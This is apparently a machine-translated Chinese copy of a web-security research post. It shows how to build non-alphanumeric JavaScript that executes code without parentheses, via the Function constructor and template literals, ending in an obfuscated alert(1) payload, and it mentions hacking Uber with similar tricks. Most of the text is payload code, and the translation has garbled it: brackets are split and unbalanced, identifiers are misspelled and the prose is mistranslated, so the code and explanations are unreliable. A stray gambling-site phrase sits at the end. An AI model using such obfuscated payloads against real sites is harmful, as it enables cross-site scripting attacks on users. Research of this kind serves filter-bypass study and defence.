执行无括号的非alphanumeric JavaScript

我决定再次查看非α数字JavaScript,看看是否可以在没有括号的情况下执行它。几年前幻灯片。使用类似的技术我们能够黑客Uber

自从我上次研究它以来,浏览器世界中的一些事情发生了变化,有趣的功能是模板文字和数组对象上的查找函数。模板文字很有用,因为您可以在没有括号的情况下调用函数,并且可以使用“未定义”来生成查找函数,因此比原始方法要短得多。

非α的基础涉及使用JavaScript对象生成最终导致代码执行的字符串。例如, +[]在JavaScript中创建零,[] [[]]创建不确定。通过将诸如未定义的对象转换为这样的字符串[[] [] []+[]] [+[]],我们可以重复使用这些字符并访问其他对象。如果要调用任意代码,我们需要调用函数的构造函数属性,例如[] .find.constructor('alert(1)')()。

因此,第一个任务是生成字符串“查找”,我们需要生成数字,以便在不确定的字符串上获取正确的索引。这是生成数字1的方法。

+!+[] // 1

基本上代码创建零!将其倒转为真,因为0在JavaScript中是虚假的,然后 +是ifix运算符,它使得成真1。然后,我们需要创建如上所述的字符串未定义,并通过将这些数字添加在一起来获得第四索引。生产“ F”。

[[] [] []+[]] [+[] [!+[]+!+!+!+!+[]+!+[] // f

然后,我们需要做同样的事情来生成其他字母增加/减少索引。

[[] [] []+[]] [+[] [!+[]+!+[]+!+[]+!+!+[]+!+[] // i
[[] [[]]+[]] [+[] [] [!+[]+!+[]+!+[]+!+!+[]+!+[]+!+[] // n
[[] [] []+[]] [+[] [!+[]+!+[]] // D

现在,我们需要组合字符并在数组文字上访问“查找”函数。

[] [[[] [] []+[]] [+[] [!+[]+!+[]+!+!+[]+!+[]+[]+[[] [] [] []+[] [+[]] [!+[]+!+[]+!+[]+!+!+!+!+[]+[[] [] [] []+[]] [+[]] [+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[] [] []+[]] [+[+[]] [!+[]+!+[]] //查找功能

这为我们提供了更多的字符,find函数的tostring值是function(){[[本机Code]},这里的重要字符是“ c”。我们可以使用上面的代码获取查找功能并将其转换为字符串,然后获得相关索引。

[[] [[] [] []+[]] [+[] [!+[]+!+!+!+!+[]+!+[]+[[] [] [] [] [] []+[]] [+[]] [!+[]+!+[]+!+[]+!+[]+!+[]]+[[] [] [] []+[]] [+[]] [!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+[]+[[] [] []+[]] [+[+[] []!+[]+!+[]]]+[]] [+[] [!+[]+!+[]+!+[]] // C

现在,我们继续使用“对象”(真和错误,并将它们转换为字符串),并获得“构造函数”的其他字符。

[[]+{}] [+[] [+!+[] // O
[[] [[]]+[]] [+[] [] [!+[]+!+[]+!+[]+!+!+[]+!+[]+!+[] // n
[![]+[]] [+[] [!+[]+!+[]+!+[]] // s
[!! []+[]] [+[] [+[+[] // T
[!! []+[]] [+[] [+!+[] // r
[[] [] []+[]] [+[] [+[+[] // U
[[] [[] [] []+[]] [+[] [!+[]+!+!+!+!+[]+!+[]+[[] [] [] [] [] []+[]] [+[]] [!+[]+!+[]+!+[]+!+[]+!+[]]+[[] [] [] []+[]] [+[]] [!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+[]+[[] [] []+[]] [+[+[] []!+[]+!+[]]]+[]] [+[] [!+[]+!+[]+!+[]] // C
[!! []+[]] [+[] [+[+[] // T
[[]+{}] [+[] [+!+[] // O
[!! []+[]] [+[] [+!+[] // r

现在可以通过在数组文字上获得两次构造函数属性来访问函数构造函数。将上面的字符组合成形成“构造函数”,然后使用数组文字[] ['constructor'] ['constructor']访问函数构造函数。

[] [[] [] [[] [] []+[]] [+[] [!+[]+!+[]+!+!+[]+!+[]]+[]+[]]]+[]] [+[] [!+[]+!+[]+!+[]+!+!+[]+!+[]]+[[] [] [] []+[]] [+[]] [!+[]+!+[]+!+[]+!+!+!+!+[]+!+[]]+[[] [] [] []+[] [+[+[+[+[+] [!+[]+!+[]]]+[]] [+[] [!+[]+!+[]+!+!+[]+[]+[]+[]+{}] [+[+[+[+[] [+!+[]]+[[] [] []+[]] [+[] [!+[]+!+!+[]+!+[]+!+!+[]+!+[]+!+[]]+[![]+[]] [+[] [!+[]+!+[]+!+[]]+[]+[]+[]+[] [+[+[+[+[+]] [+[]]+[!! []+[]] [+[] [+!+[]]+[[] [] []+[]+[] [+[] [+[+[]]+[[] [[] [[] [[]+[]] [+[] [!+[]+!+[]+!+!+[]+!+[]]+[[] [] [] [] []]+[]] [+[] [!+[]+!+[]+!+[]+!+!+[]+!+[]]+[[] [] [] []+[] [] [+[]] [!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[] [] [] []+[]] [+[+[]] [!+[]+!+[]]]+[]] [+[] [!+[]+!+[]+!+[]]+[]+[]+[]+[] [] [+[]] [+[]]+[[]+{}] [+[] [+!+[]+[!! []+[]+[] [+[] [+[+!+[]]] [[[] [[] [] [[]+[]] [+[] [!+[]+!+[]+!+[]+!+[]]+[[] [] [] [] []]+[]] [+[] [!+[]+!+[]+!+[]+!+!+[]+!+[]]+[[] [] [] []+[] [] [+[]] [!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[] [] [] []+[]] [+[+[]] [!+[]+!+[]]]+[]] [+[] [!+[]+!+[]+!+!+[]]+[[]+{}] [+[+[+[]] [+!+[]]+[[] [] []+[] [+[] [+[] [!+[]+!+[]+!+[]+!+!+[]+!+[]+!+[]]+[![]+[]] [+[] [!+[]+!+[]+!+!+[]+[!! []+[]+[] [+[]] [+[]]+[!! []+[]] [+[] [+!+[]+[[] [] []+[]+[] [+[] [+[+[]]+[[] [[] [] [[]+[]] [+[] [!+[]+!+[]+!+!+[]+!+[]+[[]]+[[] [] [] []]+[]] [+[] [] [!+[]+!+[]+!+!+!+!+[]+!+[]]+[[] [] [] []+[] [+[+[+[+[+] [!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+[[] [] [] []+[]] [+[]] [+[]][!+[]+!+[]]]+[]] [+[] [!+[]+!+[]+!+[]]+[]+[]+[]+[] [+]] [+[]]+[[]+{}] [+[+[+!+[]]+[!! []+[]] [+[+[+!+[]]]//功能

现在,我们需要生成要在这种情况下执行的代码(1),True和False可以生成警报。然后,我们需要来自[] .find函数的括号。

[!{}+[]] [+[] [+!+[]] // a
[!{}+[]] [+[] [+!+[]+!+[] // l
[!{}+[]] [+[] [+!+[]+!+[]+!+!+[]+!+[] // E
[!! []+[]] [+[] [+!+[] // r
[!! []+[]] [+[] [+[+[] // T
[[] [[] [] []+[]] [+[] [!+[]+!+!+!+!+[]+!+[]+[[] [] [] [] [] []+[]] [+[]] [!+[]+!+[]+!+[]+!+[]+!+[]]+[[] [] [] []+[]] [+[]] [!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+[]+[[] [] []+[]] [+[+[] []!+[]+!+[]]]+[]] [+[] [+!+[]+!+[]+!+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+!+[]+!+[]] //(
+!+[] // 1
[[] [[] [] []+[]] [+[] [!+[]+!+!+!+!+[]+!+[]+[[] [] [] [] [] []+[]] [+[]] [!+[]+!+[]+!+[]+!+[]+!+[]]+[[] [] [] []+[]] [+[]] [!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+[]+[[] [] []+[]] [+[+[] []!+[]+!+[]]]+[]] [+[] [+!+[]+!+[]+!+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+!+[]+!+[] //)

这就是生成的代码,我们需要执行它。模板文字也会调用一个函数,即使是表达式,这允许您将它们彼此相邻放置,并且对于非阿尔法代码非常有用。函数构造函数返回一个函数,实际上需要两次调用以执行代码。例如函数``alert''(1)``这是完全有效的JavaScript。您可能会认为您只能将生成的字符串传递到模板文字内并执行函数构造函数,但是这不会完全用作以下代码警报“ $ {'ale'+'rt(1)'}`所证明的那样。模板文字将字符串的每个部分作为参数传递,如果您在模板表达式之前和之后放置一些文本,则您会看到两个参数已发送到调用函数,第一个参数包含模板前后的文本由逗号分隔的表达和第二个参数包含模板文字表达式的结果。如以下代码所示:

函数x(){alert(gragments [0]); alert(gragonments [1])}
x`x $ {'ale'+'rt(1)'} x`

剩下要做的就是将我们生成的函数构造函数传递到模板文字上,而不是在上面使用“ x”,而是在模板文字表达式的两侧使用“ $”。这为该功能创建了两个未使用的论点。最终代码如下。

[] [[] [] [[] [] []+[]] [+[] [!+[]+!+[]+!+!+[]+!+[]]+[]+[]]]+[]] [+[] [!+[]+!+[]+!+[]+!+!+[]+!+[]]+[[] [] [] []+[]] [+[]] [!+[]+!+[]+!+[]+!+!+!+!+[]+!+[]]+[[] [] [] []+[] [+[+[+[+[+] [!+[]+!+[]]]+[]] [+[] [!+[]+!+[]+!+!+[]+[]+[]+[]+{}] [+[+[+[+[] [+!+[]]+[[] [] []+[]] [+[] [!+[]+!+!+[]+!+[]+!+!+[]+!+[]+!+[]]+[![]+[]] [+[] [!+[]+!+[]+!+[]]+[]+[]+[]+[] [+[+[+[+[+]] [+[]]+[!! []+[]] [+[] [+!+[]]+[[] [] []+[]+[] [+[] [+[+[]]+[[] [[] [[] [[]+[]] [+[] [!+[]+!+[]+!+!+[]+!+[]]+[[] [] [] [] []]+[]] [+[] [!+[]+!+[]+!+[]+!+!+[]+!+[]]+[[] [] [] []+[] [] [+[]] [!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[] [] [] []+[]] [+[+[]] [!+[]+!+[]]]+[]] [+[] [!+[]+!+[]+!+[]]+[]+[]+[]+[] [] [+[]] [+[]]+[[]+{}] [+[] [+!+[]+[!! []+[]+[] [+[] [+[+!+[]]] [[[] [[] [] [[]+[]] [+[] [!+[]+!+[]+!+[]+!+[]]+[[] [] [] [] []]+[]] [+[] [!+[]+!+[]+!+[]+!+!+[]+!+[]]+[[] [] [] []+[] [] [+[]] [!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[] [] [] []+[]] [+[+[]] [!+[]+!+[]]]+[]] [+[] [!+[]+!+[]+!+!+[]]+[[]+{}] [+[+[+[]] [+!+[]]+[[] [] []+[] [+[] [+[] [!+[]+!+[]+!+[]+!+!+[]+!+[]+!+[]]+[![]+[]] [+[] [!+[]+!+[]+!+!+[]+[!! []+[]+[] [+[]] [+[]]+[!! []+[]] [+[] [+!+[]+[[] [] []+[]+[] [+[] [+[+[]]+[[] [[] [] [[]+[]] [+[] [!+[]+!+[]+!+!+[]+!+[]+[[]]+[[] [] [] []]+[]] [+[] [] [!+[]+!+[]+!+!+!+!+[]+!+[]]+[[] [] [] []+[] [+[+[+[+[+] [!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+[[] [] [] []+[]] [+[]] [+[]][!+[]+!+[]]]+[]] [+[] [!+[]+!+[]+!+[]]+[]+[]+[]+[] [+]] [+[]]+[[]+{}] [+[+[+!+[]]+[!! []+[]] [+[+[+!+[]]]`$$ {[!{}+[]] [+[] [+!+[]+[!{!{}+[] [+[+[+!+[]+[]+!+[]]+[!{}} $````// function(alert(1))

回到所有文章

相关的研究

每日Swig的推荐故事beplay2018官网